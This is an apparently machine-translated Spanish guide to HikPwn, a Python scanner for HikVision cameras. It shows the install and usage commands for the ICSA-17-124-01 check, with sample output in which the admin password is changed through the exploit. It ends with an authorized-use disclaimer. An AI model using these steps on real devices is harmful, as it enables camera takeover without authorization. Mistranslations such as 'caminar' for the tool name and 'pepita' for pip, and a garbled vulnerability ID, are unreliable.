
Hikpwn: una guía completa para escanear dispositivos HikVision
Si está buscando una forma efectiva de descubrir y probar el dispositivo de red HikVision para obtener vulnerabilidades, por favor caminar Es una herramienta sobresaliente para investigadores de seguridad y administradores de redes. Esta guía proporciona tutoriales detallados de las características centrales, instalación, configuración y utilización de Hikpwn>.
¿Qué es Hikpwn?
caminar Es un escáner basado en Python diseñado para dispositivos HikVision que proporciona una enumeración de red pasiva y activa. Escrito en Python 3.8, proporciona capacidades básicas de escaneo de vulnerabilidad, especialmente para la conocida vulnerabilidad ICSA-17-17-124-01, que puede otorgar acceso a nivel de administrador si se explota con éxito. Hikpwn es un proyecto de código abierto solo para fines educativos y de seguridad.
Las principales características de Hikpwn
- Descubrimiento pasivo: Detectar dispositivos HikVision mediante el monitoreo no válido del tráfico de red.
- Enumeración activa: Use la sonda UDP UPNP para localizar y enumerar activamente los detalles del dispositivo.
- Prueba de vulnerabilidad: Identifique y puede utilizar ICSA-17-124-01 (acceso al administrador) y tener opciones de exploración como cambios de contraseña.
- Registro de datos: Guardar automáticamente toda la información enumerada en los archivos de registro para una fácil revisión.
- Eficiente y liviano: Probado Python 3.8 bajo Linux 4.19 x86_64.
Nota: Las próximas características incluyen soporte para el escaneo y detección de objetivos directos de CVE-2021-36260.
Instrucciones completas de instalación y configuración
1. Requisitos previos
- Python 3.8 (Entorno recomendado)
- Sistema de Linux (Probado en Linux 4.19 x86_64)
- git y pepita Instalar
2. Repositorio de clonos Github
git clone https://github.com/4n4nk3/HikPwn.git
cd HikPwn
3. Instalar dependencias
Instale todos los paquetes de Python requeridos con PIP:
pip install -r requirements.txt
Si encuentra problemas de permiso, use sudo.
Usando Hikpwn: paso a paso
Hikpwn proporciona escaneos pasivos y activos utilizando opciones de línea de comandos simples:
Uso general
python3 hikpwn.py --interface --address [--active] [--ICSA_17_124_01]
Descomposición de parámetros opcionales
| debate | describir |
|---|---|
--interface INTERFACE | La interfaz de red para usar (por ejemplo, eth0) |
--address ADDRESS | Dirección IP de la interfaz seleccionada |
--active | Habilitar el descubrimiento de dispositivos activos |
--ICSA_17_124_01 | Habilitar ICSA-17-124-01 Detección de vulnerabilidad |
-h, --help | Mostrar mensajes de ayuda y salir |
Ejemplos típicos de flujo de trabajo
- Comenzar el descubrimiento pasivo y proactivo
python3 hikpwn.py --interface eth0 --address 192.168.1.10 --active - Escanee la vulnerabilidad (ICSA-17-124-01)
python3 hikpwn.py --interface eth0 --address 192.168.1.10 --ICSA_17_124_01
Los resultados se guardan para ./log.txt Revisión más tarde.
Vista previa de salida de muestra
Using eth0 as network interface and 192.168.1.10 as its IP address...
[*] Started 30 seconds of both passive and active discovery...
================================================================================
[*] Total detected devices: 1
192.168.1.20
================================================================================
[*] Active discovery's results:
DEVICE #1:
----------------------------------------------
Serial Number: xxxxxxxxxxxxxxxxxxxxx
Description: DS-2DE4220IW-D
MAC: XX:XX:XX:XX:XX:XX
IP: 192.168.1.20
DHCP in use: false
Software Version: V5.4.3 build 160810
DSP Version: V7.3 build 160801
Boot Time: 2019-03-01 00:05:33
Activation Status: true
Password Reset Ability: true
================================================================================
[*] Passive discovery's results:
DEVICE #1: Detected device with IP address 192.168.1.20 and MAC address XX:XX:XX:XX:XX:XX.
================================================================================
[*] Starting scan for ICSA-17-124-01...
192.168.1.20 is vulnerable to ICSA_17_124_01. Recovered user list:
user_id: 1, user_name: admin, priority: high, user_level: Administrator
Do you want to exploit the vulnerability and try to change admin's password? (y/n)
>>> y
Enter a password composed of numbers and letters (8-12 characters):
>>>
Password change successful.
Descargo de responsabilidad de seguridad importante
Hikpwn solo se usa para pruebas de seguridad educativas y autorizadas. No utilice esta herramienta para escaneo o desarrollo no autorizado de redes y dispositivos. El abuso puede ser ilegal e inmoral.









